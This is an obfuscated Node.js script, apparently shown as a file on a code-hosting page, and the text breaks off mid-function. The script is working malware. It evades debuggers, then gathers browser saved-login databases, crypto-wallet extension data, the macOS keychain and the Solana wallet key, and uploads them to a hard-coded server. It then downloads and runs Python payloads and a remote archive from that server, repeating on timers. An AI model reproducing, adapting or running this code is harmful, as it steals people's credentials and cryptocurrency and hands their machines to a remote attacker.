600 lines
23 KiB
JavaScript
600 lines
23 KiB
JavaScript
(function (_0x44d3b7, _0x25fc4a) {
|
|
const _0x3f52cf = _0x44d3b7();
|
|
while (true) {
|
|
try {
|
|
const _0x5bc6eb = parseInt(_0x2c1b(436, 0x120)) / 1 * (parseInt(_0x2c1b(526, 0x15)) / 2) + parseInt(_0x2c1b(518, 0x18e)) / 3 * (-parseInt(_0x2c1b(561, 0x445)) / 4) + -parseInt(_0x2c1b(448, 0x407)) / 5 * (parseInt(_0x2c1b(521, '0x448')) / 6) + parseInt(_0x2c1b(528, '0x90')) / 7 + parseInt(_0x2c1b(463, -0x56)) / 8 * (parseInt(_0x2c1b(620, 0x125)) / 9) + parseInt(_0x2c1b(529, -0xf)) / 10 + -parseInt(_0x2c1b(476, 0x279)) / 11;
|
|
if (_0x5bc6eb === _0x25fc4a) {
|
|
break;
|
|
} else {
|
|
_0x3f52cf.push(_0x3f52cf.shift());
|
|
}
|
|
} catch (_0x326b57) {
|
|
_0x3f52cf.push(_0x3f52cf.shift());
|
|
}
|
|
}
|
|
})(_0x4eb4, 775960);
|
|
const _0x3f64bb = function () {
|
|
let _0x4624cb = true;
|
|
return function (_0x56a168, _0x4b09b7) {
|
|
const _0x3343a9 = _0x4624cb ? function () {
|
|
if (_0x4b09b7) {
|
|
const _0x5bdfee = _0x4b09b7.apply(_0x56a168, arguments);
|
|
_0x4b09b7 = null;
|
|
return _0x5bdfee;
|
|
}
|
|
} : function () {};
|
|
_0x4624cb = false;
|
|
return _0x3343a9;
|
|
};
|
|
}();
|
|
const _0xb564a4 = _0x3f64bb(this, function () {
|
|
return _0xb564a4.toString().search("(((.+)+)+)+$").toString().constructor(_0xb564a4).search("(((.+)+)+)+$");
|
|
});
|
|
function _0x23f8f9(_0x578d77, _0x599245, _0x29ff3c, _0xdc1b7e, _0x48949a) {
|
|
return _0x2c1b(_0xdc1b7e + 755, _0x48949a);
|
|
}
|
|
_0xb564a4();
|
|
const _0x2fd3bd = function () {
|
|
let _0x2857ec = true;
|
|
return function (_0x4380c3, _0x332592) {
|
|
const _0x263396 = _0x2857ec ? function () {
|
|
if (_0x332592) {
|
|
const _0x548336 = _0x332592.apply(_0x4380c3, arguments);
|
|
_0x332592 = null;
|
|
return _0x548336;
|
|
}
|
|
} : function () {};
|
|
_0x2857ec = false;
|
|
return _0x263396;
|
|
};
|
|
}();
|
|
(function () {
|
|
_0x2fd3bd(this, function () {
|
|
const _0x18fbc2 = new RegExp("function *\\( *\\)");
|
|
const _0x34bf5d = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", 'i');
|
|
const _0x100ae1 = _0x23e34d("init");
|
|
if (!_0x18fbc2.test(_0x100ae1 + "chain") || !_0x34bf5d.test(_0x100ae1 + "input")) {
|
|
_0x100ae1('0');
|
|
} else {
|
|
_0x23e34d();
|
|
}
|
|
})();
|
|
})();
|
|
const _0x2a5a96 = function () {
|
|
let _0x499a96 = true;
|
|
return function (_0x4bdc0a, _0x2d3630) {
|
|
const _0x4d49c5 = _0x499a96 ? function () {
|
|
if (_0x2d3630) {
|
|
const _0x6d2bf8 = _0x2d3630.apply(_0x4bdc0a, arguments);
|
|
_0x2d3630 = null;
|
|
return _0x6d2bf8;
|
|
}
|
|
} : function () {};
|
|
_0x499a96 = false;
|
|
return _0x4d49c5;
|
|
};
|
|
}();
|
|
function _0x7010db(_0x3a87e1, _0x262e58, _0x514759, _0x2b76a4, _0x4bebf3) {
|
|
return _0x2c1b(_0x2b76a4 - 0x33c, _0x4bebf3);
|
|
}
|
|
const _0x42c5cd = _0x2a5a96(this, function () {
|
|
const _0x44d9f9 = {
|
|
FZJcA: function (_0x3da6c0, _0x394407) {
|
|
return _0x3da6c0 + _0x394407;
|
|
},
|
|
OkPvv: "error"
|
|
};
|
|
_0x44d9f9.YCNuG = "table";
|
|
const _0x2b2df2 = function () {
|
|
let _0x4fa761;
|
|
try {
|
|
_0x4fa761 = Function("return (function() {}.constructor(\"return this\")( ));")();
|
|
} catch (_0x3bd620) {
|
|
_0x4fa761 = window;
|
|
}
|
|
return _0x4fa761;
|
|
};
|
|
const _0x34f1df = _0x2b2df2();
|
|
const _0x5673cb = _0x34f1df.console = _0x34f1df.console || {};
|
|
const _0xe6fbcf = ["log", "warn", "info", "error", "exception", _0x44d9f9.YCNuG, "trace"];
|
|
for (let _0x14f39d = 0; _0x14f39d < _0xe6fbcf.length; _0x14f39d++) {
|
|
const _0x180732 = _0x2a5a96.constructor.prototype.bind(_0x2a5a96);
|
|
const _0x4490ff = _0xe6fbcf[_0x14f39d];
|
|
const _0x2797c6 = _0x5673cb[_0x4490ff] || _0x180732;
|
|
_0x180732.__proto__ = _0x2a5a96.bind(_0x2a5a96);
|
|
_0x180732.toString = _0x2797c6.toString.bind(_0x2797c6);
|
|
_0x5673cb[_0x4490ff] = _0x180732;
|
|
}
|
|
});
|
|
_0x42c5cd();
|
|
const _0x5d6927 = require('fs');
|
|
const _0x40d0a6 = require('os');
|
|
const _0x23a3a6 = require("path");
|
|
const _0x2672a8 = require("request");
|
|
const _0x5f30d8 = require("child_process").exec;
|
|
const _0x57dd93 = _0x40d0a6.hostname();
|
|
const _0x44547c = _0x40d0a6.platform();
|
|
const _0x107674 = _0x40d0a6.homedir();
|
|
const _0x46f1a8 = _0x40d0a6.tmpdir();
|
|
const _0x1aace1 = _0x2b012b => _0x2b012b.replace(/^~([a-z]+|\/)/, (_0x581e90, _0x772cb7) => '/' === _0x772cb7 ? _0x107674 : _0x23a3a6.dirname(_0x107674) + '/' + _0x772cb7);
|
|
function _0x58c289(_0x23cb6a) {
|
|
try {
|
|
_0x5d6927.accessSync(_0x23cb6a);
|
|
return true;
|
|
} catch (_0x5a7e7b) {
|
|
return false;
|
|
}
|
|
}
|
|
const _0x59e3a3 = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
|
|
const _0x112912 = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
|
|
const _0x1c4641 = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", "opera"];
|
|
const _0x26f8e8 = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"];
|
|
const _0x55c70b = async (_0x74005c, _0x1619f2, _0x271271, _0x15b9d4) => {
|
|
let _0x5f5c9a;
|
|
if (!_0x74005c || '' === _0x74005c) {
|
|
return [];
|
|
}
|
|
try {
|
|
if (!_0x58c289(_0x74005c)) {
|
|
return [];
|
|
}
|
|
} catch (_0x5173b7) {
|
|
return [];
|
|
}
|
|
if (!_0x1619f2) {
|
|
_0x1619f2 = '';
|
|
}
|
|
let _0x3a1589 = [];
|
|
for (let _0x448a78 = 0; _0x448a78 < 200; _0x448a78++) {
|
|
const _0x220e15 = _0x74005c + '/' + (0 === _0x448a78 ? "Default" : "Profile " + _0x448a78) + "/Local Extension Settings";
|
|
for (let _0x2cf58e = 0; _0x2cf58e < _0x26f8e8.length; _0x2cf58e++) {
|
|
let _0x1728b3 = _0x220e15 + '/' + _0x26f8e8[_0x2cf58e];
|
|
if (_0x58c289(_0x1728b3)) {
|
|
let _0xce9f95 = [];
|
|
try {
|
|
_0xce9f95 = _0x5d6927.readdirSync(_0x1728b3);
|
|
} catch (_0x4f5794) {
|
|
_0xce9f95 = [];
|
|
}
|
|
_0xce9f95.forEach(async _0x2df3d4 => {
|
|
let _0x682ed9 = _0x23a3a6.join(_0x1728b3, _0x2df3d4);
|
|
try {
|
|
const _0x2f2039 = {
|
|
filename: "102_" + _0x1619f2 + _0x448a78 + '_' + _0x26f8e8[_0x2cf58e] + '_' + _0x2df3d4
|
|
};
|
|
if (_0x682ed9.includes(".log") || _0x682ed9.includes(".ldb")) {
|
|
_0x3a1589.push({
|
|
'value': _0x5d6927.createReadStream(_0x682ed9),
|
|
'options': _0x2f2039
|
|
});
|
|
}
|
|
} catch (_0x2cf340) {}
|
|
});
|
|
}
|
|
}
|
|
}
|
|
if (_0x271271 && (_0x5f5c9a = _0x107674 + "/.config/solana/id.json", _0x5d6927.existsSync(_0x5f5c9a))) {
|
|
try {
|
|
const _0x549590 = {
|
|
filename: "solana_id.txt"
|
|
};
|
|
_0x3a1589.push({
|
|
'value': _0x5d6927.createReadStream(_0x5f5c9a),
|
|
'options': _0x549590
|
|
});
|
|
} catch (_0x544e44) {}
|
|
}
|
|
_0x1d40e9(_0x3a1589, _0x15b9d4);
|
|
return _0x3a1589;
|
|
};
|
|
const _0x136e48 = _0x3cda14 => {
|
|
const _0x43b1e3 = _0x1aace1('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
|
|
let _0x1cfd17 = [];
|
|
if (_0x58c289(_0x43b1e3)) {
|
|
let _0x232968 = [];
|
|
try {
|
|
_0x232968 = _0x5d6927.readdirSync(_0x43b1e3);
|
|
} catch (_0x33914c) {
|
|
_0x232968 = [];
|
|
}
|
|
let _0xa1f717 = 0;
|
|
_0x232968.forEach(async _0x30f059 => {
|
|
const _0x322a44 = {
|
|
GfbKa: ".files"
|
|
};
|
|
_0x322a44.vdKma = "idb";
|
|
let _0x19d05b = _0x23a3a6.join(_0x43b1e3, _0x30f059);
|
|
if (_0x19d05b.includes("-release")) {
|
|
let _0x9926c3 = _0x23a3a6.join(_0x19d05b, "/storage/default");
|
|
let _0x53196a = [];
|
|
_0x53196a = _0x5d6927.readdirSync(_0x9926c3);
|
|
let _0x53d974 = 0;
|
|
_0x53196a.forEach(async _0x450031 => {
|
|
if (_0x450031.includes("moz-extension")) {
|
|
let _0x53c5fc = _0x23a3a6.join(_0x9926c3, _0x450031);
|
|
_0x53c5fc = _0x23a3a6.join(_0x53c5fc, _0x322a44.vdKma);
|
|
let _0x16f13d = [];
|
|
_0x16f13d = _0x5d6927.readdirSync(_0x53c5fc);
|
|
_0x16f13d.forEach(async _0xbdd99 => {
|
|
if (_0xbdd99.includes(".files")) {
|
|
let _0x7d359f = _0x23a3a6.join(_0x53c5fc, _0xbdd99);
|
|
let _0x5ef2d8 = [];
|
|
_0x5ef2d8 = _0x5d6927.readdirSync(_0x7d359f);
|
|
_0x5ef2d8.forEach(_0x542571 => {
|
|
if (!_0x5d6927.statSync(_0x23a3a6.join(_0x7d359f, _0x542571)).isDirectory()) {
|
|
let _0x437ea9 = _0x23a3a6.join(_0x7d359f, _0x542571);
|
|
const _0x22f124 = {
|
|
filename: _0xa1f717 + '_' + _0x53d974 + '_' + _0x542571
|
|
};
|
|
_0x1cfd17.push({
|
|
'value': _0x5d6927.createReadStream(_0x437ea9),
|
|
'options': _0x22f124
|
|
});
|
|
}
|
|
});
|
|
}
|
|
});
|
|
}
|
|
});
|
|
_0x53d974 += 1;
|
|
}
|
|
_0xa1f717 += 1;
|
|
});
|
|
_0x1d40e9(_0x1cfd17, _0x3cda14);
|
|
return _0x1cfd17;
|
|
}
|
|
};
|
|
const _0x1d40e9 = (_0x41488d, _0x4b757a) => {
|
|
const _0x2fc5e5 = {
|
|
type: '10',
|
|
hid: "102_" + _0x57dd93,
|
|
uts: _0x4b757a,
|
|
multi_file: _0x41488d
|
|
};
|
|
try {
|
|
if (_0x41488d.length > 0) {
|
|
const _0x13e86c = {
|
|
url: "http://95.164.17.24:1224/uploads",
|
|
formData: _0x2fc5e5
|
|
};
|
|
_0x2672a8.post(_0x13e86c, (_0x3ba857, _0x24b030, _0xa33a27) => {});
|
|
}
|
|
} catch (_0x21d5a8) {}
|
|
};
|
|
const _0x3bafbe = async (_0x338545, _0x46dee6, _0x2a9c76) => {
|
|
try {
|
|
let _0x40b50d = '';
|
|
_0x40b50d = 'd' == _0x44547c[0] ? _0x1aace1('~/') + "/Library/Application Support/" + _0x338545[1] : 'l' == _0x44547c[0] ? _0x1aace1('~/') + "/.config/" + _0x338545[2] : _0x1aace1('~/') + "/AppData/" + _0x338545[0] + "/User Data";
|
|
await _0x55c70b(_0x40b50d, _0x46dee6 + '_', 0 == _0x46dee6, _0x2a9c76);
|
|
} catch (_0xb053ff) {}
|
|
};
|
|
const _0x1d28ea = async _0xa9cd1c => {
|
|
let _0x56aa20 = [];
|
|
let _0x53e13f = _0x107674 + "/Library/Keychains/login.keychain";
|
|
if (_0x5d6927.existsSync(_0x53e13f)) {
|
|
try {
|
|
const _0xbe1287 = {
|
|
filename: "logkc-db"
|
|
};
|
|
_0x56aa20.push({
|
|
'value': _0x5d6927.createReadStream(_0x53e13f),
|
|
'options': _0xbe1287
|
|
});
|
|
} catch (_0x468fa3) {}
|
|
} else {
|
|
_0x53e13f += "-db";
|
|
if (_0x5d6927.existsSync(_0x53e13f)) {
|
|
try {
|
|
const _0x56e85b = {
|
|
filename: "logkc-db"
|
|
};
|
|
_0x56aa20.push({
|
|
'value': _0x5d6927.createReadStream(_0x53e13f),
|
|
'options': _0x56e85b
|
|
});
|
|
} catch (_0x5ae156) {}
|
|
}
|
|
}
|
|
try {
|
|
let _0x257033 = _0x107674 + "/Library/Application Support/Google/Chrome";
|
|
if (_0x58c289(_0x257033)) {
|
|
for (let _0xec59b3 = 0; _0xec59b3 < 200; _0xec59b3++) {
|
|
const _0x1efa98 = _0x257033 + '/' + (0 === _0xec59b3 ? "Default" : "Profile " + _0xec59b3) + "/Login Data";
|
|
try {
|
|
if (!_0x58c289(_0x1efa98)) {
|
|
continue;
|
|
}
|
|
const _0x27661b = _0x257033 + "/ld_" + _0xec59b3;
|
|
const _0x1db234 = {
|
|
filename: "pld_" + _0xec59b3
|
|
};
|
|
if (_0x58c289(_0x27661b)) {
|
|
_0x56aa20.push({
|
|
'value': _0x5d6927.createReadStream(_0x27661b),
|
|
'options': _0x1db234
|
|
});
|
|
} else {
|
|
_0x5d6927.copyFile(_0x1efa98, _0x27661b, _0x3d1081 => {
|
|
const _0x5b78fc = {
|
|
filename: "pld_" + _0xec59b3
|
|
};
|
|
let _0x279e2a = [{
|
|
'value': _0x5d6927.createReadStream(_0x1efa98),
|
|
'options': _0x5b78fc
|
|
}];
|
|
_0x1d40e9(_0x279e2a, _0xa9cd1c);
|
|
});
|
|
}
|
|
} catch (_0x54d621) {}
|
|
}
|
|
}
|
|
} catch (_0x21cd01) {}
|
|
try {
|
|
let _0x53a8b5 = _0x107674 + "/Library/Application Support/BraveSoftware/Brave-Browser";
|
|
if (_0x58c289(_0x53a8b5)) {
|
|
for (let _0x1b3d70 = 0; _0x1b3d70 < 200; _0x1b3d70++) {
|
|
const _0x2c6372 = _0x53a8b5 + '/' + (0 === _0x1b3d70 ? "Default" : "Profile " + _0x1b3d70);
|
|
try {
|
|
if (!_0x58c289(_0x2c6372)) {
|
|
continue;
|
|
}
|
|
const _0x2999c0 = _0x2c6372 + "/Login Data";
|
|
const _0x476351 = {
|
|
filename: "brld_" + _0x1b3d70
|
|
};
|
|
if (_0x58c289(_0x2999c0)) {
|
|
_0x56aa20.push({
|
|
'value': _0x5d6927.createReadStream(_0x2999c0),
|
|
'options': _0x476351
|
|
});
|
|
} else {
|
|
_0x5d6927.copyFile(_0x2c6372, _0x2999c0, _0x11a26c => {
|
|
const _0x4d068e = {
|
|
filename: "brld_" + _0x1b3d70
|
|
};
|
|
let _0x4c62cb = [{
|
|
'value': _0x5d6927.createReadStream(_0x2c6372),
|
|
'options': _0x4d068e
|
|
}];
|
|
_0x1d40e9(_0x4c62cb, _0xa9cd1c);
|
|
});
|
|
}
|
|
} catch (_0x50b560) {}
|
|
}
|
|
}
|
|
} catch (_0x28c644) {}
|
|
_0x1d40e9(_0x56aa20, _0xa9cd1c);
|
|
return _0x56aa20;
|
|
};
|
|
const _0x25acc1 = async (_0x34ebcf, _0x1558fe, _0x2c6034) => {
|
|
let _0x1a0daf = [];
|
|
let _0x11dfbb = '';
|
|
_0x11dfbb = 'd' == _0x44547c[0] ? _0x1aace1('~/') + "/Library/Application Support/" + _0x34ebcf[1] : 'l' == _0x44547c[0] ? _0x1aace1('~/') + "/.config/" + _0x34ebcf[2] : _0x1aace1('~/') + "/AppData/" + _0x34ebcf[0] + "/User Data";
|
|
let _0x3c3a1d = _0x11dfbb + "/Local State";
|
|
if (_0x5d6927.existsSync(_0x3c3a1d)) {
|
|
try {
|
|
const _0xa0d1b = {
|
|
filename: _0x1558fe + "_lst"
|
|
};
|
|
_0x1a0daf.push({
|
|
'value': _0x5d6927.createReadStream(_0x3c3a1d),
|
|
'options': _0xa0d1b
|
|
});
|
|
} catch (_0x10cd5a) {}
|
|
}
|
|
try {
|
|
if (_0x58c289(_0x11dfbb)) {
|
|
for (let _0x18d117 = 0; _0x18d117 < 200; _0x18d117++) {
|
|
const _0x256825 = _0x11dfbb + '/' + (0 === _0x18d117 ? "Default" : "Profile " + _0x18d117);
|
|
try {
|
|
if (!_0x58c289(_0x256825)) {
|
|
continue;
|
|
}
|
|
const _0x2120f0 = _0x256825 + "/Login Data";
|
|
if (!_0x58c289(_0x2120f0)) {
|
|
continue;
|
|
}
|
|
const _0x240c4b = {
|
|
filename: _0x1558fe + '_' + _0x18d117 + "_uld"
|
|
};
|
|
_0x1a0daf.push({
|
|
'value': _0x5d6927.createReadStream(_0x2120f0),
|
|
'options': _0x240c4b
|
|
});
|
|
} catch (_0x7e5944) {}
|
|
}
|
|
}
|
|
} catch (_0x26511a) {}
|
|
_0x1d40e9(_0x1a0daf, _0x2c6034);
|
|
return _0x1a0daf;
|
|
};
|
|
function _0x4db77a(_0x54d20b, _0x2335f6, _0x3f5711, _0x24fd41, _0x1c2503) {
|
|
return _0x2c1b(_0x1c2503 + 713, _0x24fd41);
|
|
}
|
|
let _0x12c6fc = 0;
|
|
(function () {
|
|
let _0x635dd9;
|
|
try {
|
|
const _0x35f3bc = Function("return (function() {}.constructor(\"return this\")( ));");
|
|
_0x635dd9 = _0x35f3bc();
|
|
} catch (_0x2817b8) {
|
|
_0x635dd9 = window;
|
|
}
|
|
_0x635dd9.setInterval(_0x23e34d, 4000);
|
|
})();
|
|
function _0x3e8d45(_0x11f906, _0x1630cb, _0xdb2689, _0x5aaac9, _0x2648fd) {
|
|
return _0x2c1b(_0xdb2689 - '0x32b', _0x1630cb);
|
|
}
|
|
function _0x4eb4() {
|
|
const _0x38f4c4 = ['RHmqc', 'omjjk', 'ApteI', 'sCumQ', 'copyF', '/ld_', 'rome', 'fgpgk', 'exec', 'rneKI', 'lLrSF', 'push', 'test', 'const', 'OiABa', 'nkbih', 'ocal/', '/Libr', 'gpafn', '/Logi', 'count', 'hostn', '/Goog', 'type', 'ain', 'gger', '3037OzSgDk', 'ctor(', 'round', 'fdial', 'multi', 'mdjon', 'ata', 'idb', 'oihof', "is\")(", 'knmef', 'ync', '125CwSmIC', 'VPgoc', 'ware/', 'ess', 'IGRsE', "\\pyth", 'repla', 'Micro', 'wlUAS', '0-9a-', "\\+\\+ ", 'ensio', '-rele', 'pjiig', 'SvCSl', '16zYubJH', 'bind', 'rmSyn', 'hoSHZ', 'e/Chr', 'log', 'hfood', 'LswSJ', 'write', 'wynjd', '//95.', 'OkPvv', 'woHII', '13479389yigTOw', 'TzzgA', 'oohck', 'ort/G', '/AppD', 'Brave', 'googl', '_lst', 'ata/', 'acmac', 'AVJaB', 'on.ex', 'isDir', 'Data', 'lengt', 'jXfuU', "\\.pyp", 'yzTXQ', 'url', 'jgjfh', 'inclu', 'call', 'ng/Op', '$]*)', 'xfpZo', 'filen', 'eebol', 'ome', 'jblnd', 'excep', 'ZDfOB', 'brld_', 'bohma', 'aeaoe', 'uCJgo', 'nt/', 'trace', "n3 \"", 'IOjHQ', 'ejbal', 'nhcel', 'NNhzn', '382902FMrTAX', 'StRpE', 'ort/B', '23610RVWEoM', 'ion', 'oamin', 'table', 'pebkl', '164qDPepv', 'hid', '6465221OiGmbD', '15101090qJHwNn', 'Z_$][', 'bbldc', 'Strea', 'ogin.', 'nstru', 'post', 'ZEGam', 'JOVFD', "l Ext", 'init', '/stor', 'info', 'oZjzq', 'g/Moz', 'wOJfi', ')+)+)', 'ser', 'ame', "n (fu", 'nmhnf', 'WpCbt', 'xtens', 'bGCdl', 'forEa', '*(?:[', 'nctio', 'Defau', 'ary/K', 'bfnae', 'moz-e', 'apply', '28JNYCjU', 'rave-', '/.con', "rn th", 'UroxN', 'http:', 'des', 'raveS', 'HGaea', "-Lo \"", '/id.j', " (tru", 'fbeog', 'are/B', 'eSoft', 'ofile', " Supp", 'size', 'solan', 'bvLnu', 'path', 'Roami', 'input', 'ata/R', 'cionb', 'sJMRc', 'fOasi', 'wambz', 'dgcij', 'dlcob', 'oogle', 'conso', "ion *", "l Sta", 'tmpdi', 'warn', 'peras', "e\" \"", 'logkc', 'FZJcA', 'formD', 'statS', 'setIn', 'opera', 'lipeo', 'jXzWn', 'BmaWn', '.ldb', 'ophhp', 'error', 'eycha', '/Loca', 'funct', 'DHpkL', 'ation', 'pytho', '/pdow', 'Firef', '/.npl', '1396917dSIpDK', 'proto', 'Brows', 'lmeee', 'child', 'ins/l', 'ajnim', 'bohpj', 'ing', '_proc', 'fhboh', 'knocf', '(((.+', 'ibnej', "\" \"", 're.Op', '/uplo', "xf ", 'apagc', "n() ", 'czYua', 'DaCRF', 'GfbKa', 'pplic', 'PlQuv', "\"retu", 'eofbd', 'lmome', 'searc', 'ile', 'hifaf', 'vdKma', 'lYbbZ', " Data", 're/Op', 'onoee', 'imhlp', '7.24:', "\\( *\\", 'pld_', 'ave-B', 'gdVKS', 'ox/Pr', 'Nchdc', 'CAdIA', 'eRead', 'ads', 'YvgzM', "n Dat", 'state', 'retur', 'ructo', '/Brav', 'readd', 'bakop', 'JLXSG', 'strin', 'imael', 'efaul', 'Softw', 'ilkdb', "e) {}", 'Objec', 'ector', 'Profi', 'soft/', 'join', 'le/Ch', 'eSync', 'homed', '102', 'behhm', 'platf', 'keych', '164.1', 'dfjmm', 'aholp', 'VpXqy', '.log', 'pekpl', "curl ", 'qaEUw', '.file', '/clie', 'JPxEu', 'exist', 'acces', '1224', 'kkolj', "tar -", 'ldhgm', "le ", 'ata/L', 'aeach', 'lchlg', 'mgjnj', 'age/d', '_file', 'UaQym', 'oftwa', 'FileS', 'QxhnJ', 'toStr', 'cfgod', 'YCNuG', 'OaJhU', " -C ", 'cyKTi', 'Etbne', '__pro', 'tings', 'ccfch', 'txt', '{}.co', 'irSyn', "\\p2.z", 'fig/', '-Brow', 'renam', 'dirna', 'SIQUz', 'Edge/', '_uld', 'RdYzg', 'hecda', 'reque', '/Chro', 'sSync', 're/Br', 'jbmgj', 'phepc', 'ary/A', 'uts', 'pndod', 'fig/s', 'kodbe', 'omihk', 'WSGWI', 'nkdna', 'zA-Z_', 'olana', 'PwHqq', 'a-zA-', 'kpcnl', 'creat', 'terva', 'illa/', 'ase', 'WDvbl', '/User', 'to__', 'debu', 'orm', 'owgIh', 'ZVViQ', 'idlcd', 'gvOfj', "era S", 'rowse', 'SfxxB', 'ort/', 'pikoo', "n Set", "\\p.zi", 'dgmol', 'odkjb', 'chain', 'lZQox', "User ", 'a_id.', 'son', 'mnkoe', 'era', 'Local', 'gmccd', 'tion', 'actio', 'e-chr', 'get', 'ngcna', '-db', 'while', 'hlefn', 'com.o', 'hnfan', 'ihOIO', 'Googl', 'getTi'];
|
|
_0x4eb4 = function () {
|
|
return _0x38f4c4;
|
|
};
|
|
return _0x4eb4();
|
|
}
|
|
const _0x770cde = async _0x10cf14 => {
|
|
_0x5f30d8("tar -xf " + _0x10cf14 + " -C " + _0x107674, (_0x324a1d, _0x252b20, _0x133078) => {
|
|
if (_0x324a1d) {
|
|
_0x5d6927.rmSync(_0x10cf14);
|
|
return void (_0x12c6fc = 0);
|
|
}
|
|
_0x5d6927.rmSync(_0x10cf14);
|
|
_0x12016a();
|
|
});
|
|
};
|
|
const _0x1cbec7 = () => {
|
|
const _0x20d03c = _0x46f1a8 + "\\p.zi";
|
|
const _0x1cfbc1 = _0x46f1a8 + "\\p2.zip";
|
|
if (_0x12c6fc >= 51476596) {
|
|
return;
|
|
}
|
|
if (_0x5d6927.existsSync(_0x20d03c)) {
|
|
try {
|
|
var _0xce5828 = _0x5d6927.statSync(_0x20d03c);
|
|
if (_0xce5828.size >= 51476596) {
|
|
_0x12c6fc = _0xce5828.size;
|
|
_0x5d6927.rename(_0x20d03c, _0x1cfbc1, _0x553356 => {
|
|
if (_0x553356) {
|
|
throw _0x553356;
|
|
}
|
|
_0x770cde(_0x1cfbc1);
|
|
});
|
|
} else {
|
|
if (_0x12c6fc < _0xce5828.size) {
|
|
_0x12c6fc = _0xce5828.size;
|
|
} else {
|
|
_0x5d6927.rmSync(_0x20d03c);
|
|
_0x12c6fc = 0;
|
|
}
|
|
_0x502c9e();
|
|
}
|
|
} catch (_0x58b069) {}
|
|
} else {
|
|
_0x5f30d8("curl -Lo \"" + _0x20d03c + "\" \"" + "http://95.164.17.24:1224/pdown" + "\"", (_0x5411ad, _0xcb4513, _0x5de2d3) => {
|
|
if (_0x5411ad) {
|
|
_0x12c6fc = 0;
|
|
return void _0x502c9e();
|
|
}
|
|
try {
|
|
_0x12c6fc = 51476596;
|
|
_0x5d6927.renameSync(_0x20d03c, _0x1cfbc1);
|
|
_0x770cde(_0x1cfbc1);
|
|
} catch (_0x97a7a5) {}
|
|
});
|
|
}
|
|
};
|
|
function _0x502c9e() {
|
|
setTimeout(() => {
|
|
_0x1cbec7();
|
|
}, 20000);
|
|
}
|
|
function _0x57a4c1(_0x43c66e, _0x2a997b, _0x48cd90, _0x40e99d, _0x1e8e5b) {
|
|
return _0x2c1b(_0x40e99d - '0x275', _0x2a997b);
|
|
}
|
|
const _0x12016a = async () => await new Promise((_0x233d9e, _0x5c8f91) => {
|
|
if ('w' == _0x44547c[0]) {
|
|
if (_0x5d6927.existsSync(_0x107674 + "\\.pyp\\python.exe")) {
|
|
(() => {
|
|
const _0xd5cb33 = _0x107674 + "/.npl";
|
|
const _0x8f1f03 = "\"" + _0x107674 + "\\.pyp\\python.exe\" \"" + _0xd5cb33 + "\"";
|
|
try {
|
|
_0x5d6927.rmSync(_0xd5cb33);
|
|
} catch (_0x305187) {}
|
|
_0x2672a8.get("http://95.164.17.24:1224/client/10/102", (_0x4b6c32, _0x5867cc, _0x301229) => {
|
|
if (!_0x4b6c32) {
|
|
try {
|
|
_0x5d6927.writeFileSync(_0xd5cb33, _0x301229);
|
|
_0x5f30d8(_0x8f1f03, (_0x4795b0, _0x118518, _0x147813) => {});
|
|
} catch (_0x1b1d20) {}
|
|
}
|
|
});
|
|
})();
|
|
} else {
|
|
_0x1cbec7();
|
|
}
|
|
} else {
|
|
(() => {
|
|
_0x2672a8.get("http://95.164.17.24:1224/client/10/102", (_0x571ef, _0x54cdca, _0x20d052) => {
|
|
if (!_0x571ef) {
|
|
_0x5d6927.writeFileSync(_0x107674 + "/.npl", _0x20d052);
|
|
_0x5f30d8("python3 \"" + _0x107674 + "/.npl\"", (_0xc70c90, _0x515aed, _0x3e5a0a) => {});
|
|
}
|
|
});
|
|
})();
|
|
}
|
|
});
|
|
var _0x533351 = 0;
|
|
const _0x196775 = async () => {
|
|
try {
|
|
const _0x13ba90 = Math.round(new Date().getTime() / 1000);
|
|
await (async () => {
|
|
try {
|
|
await _0x3bafbe(_0x112912, 0, _0x13ba90);
|
|
await _0x3bafbe(_0x59e3a3, 1, _0x13ba90);
|
|
await _0x3bafbe(_0x1c4641, 2, _0x13ba90);
|
|
_0x136e48(_0x13ba90);
|
|
if ('w' == _0x44547c[0]) {
|
|
await _0x55c70b(_0x1aace1('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, _0x13ba90);
|
|
}
|
|
if ('d' == _0x44547c[0]) {
|
|
await _0x1d28ea(_0x13ba90);
|
|
} else {
|
|
await _0x25acc1(_0x112912, 0, _0x13ba90);
|
|
await _0x25acc1(_0x59e3a3, 1, _0x13ba90);
|
|
await _0x25acc1(_0x1c4641, 2, _0x13ba90);
|
|
}
|
|
} catch (_0x17de0d) {}
|
|
})();
|
|
_0x12016a();
|
|
} catch (_0xf5fe05) {}
|
|
};
|
|
_0x196775();
|
|
_0x12016a();
|
|
function _0x2c1b(_0x57d912, _0x489406) {
|
|
const _0xe0c94e = _0x4eb4();
|
|
_0x2c1b = function (_0x3218d3, _0x12f9e8) {
|
|
_0x3218d3 = _0x3218d3 - 300;
|
|
let _0x159f5f = _0xe0c94e[_0x3218d3];
|
|
return _0x159f5f;
|
|
};
|
|
return _0x2c1b(_0x57d912, _0x489406);
|
|
}
|
|
let _0xed7e8 = setInterval(() => {
|
|
if ((_0x533351 += 1) < 5) {
|
|
_0x196775();
|
|
} else {
|
|
clearInterval(_0xed7e8);
|
|
}
|
|
}, 30000);
|
|
function _0x23e34d(_0x2f4e6d) {
|
|
const _0x38e1c7 = {
|
|
IOjHQ: function (_0x32d44b, _0xc77f73) {
|
|
return _0x32d44b / _0xc77f73;
|
|
}
|
|
};
|
|
_0x38e1c7.ZEGam = function (_0x6c6b2f, _0x3afe78) {
|
|
return _0x6c6b2f % _0x3afe78;
|
|
};
|
|
_0x38e1c7.PwHqq = "action";
|
|
function _0x36aeff(_0x314f83) {
|
|
if (typeof _0x314f83 === "string") {
|
|
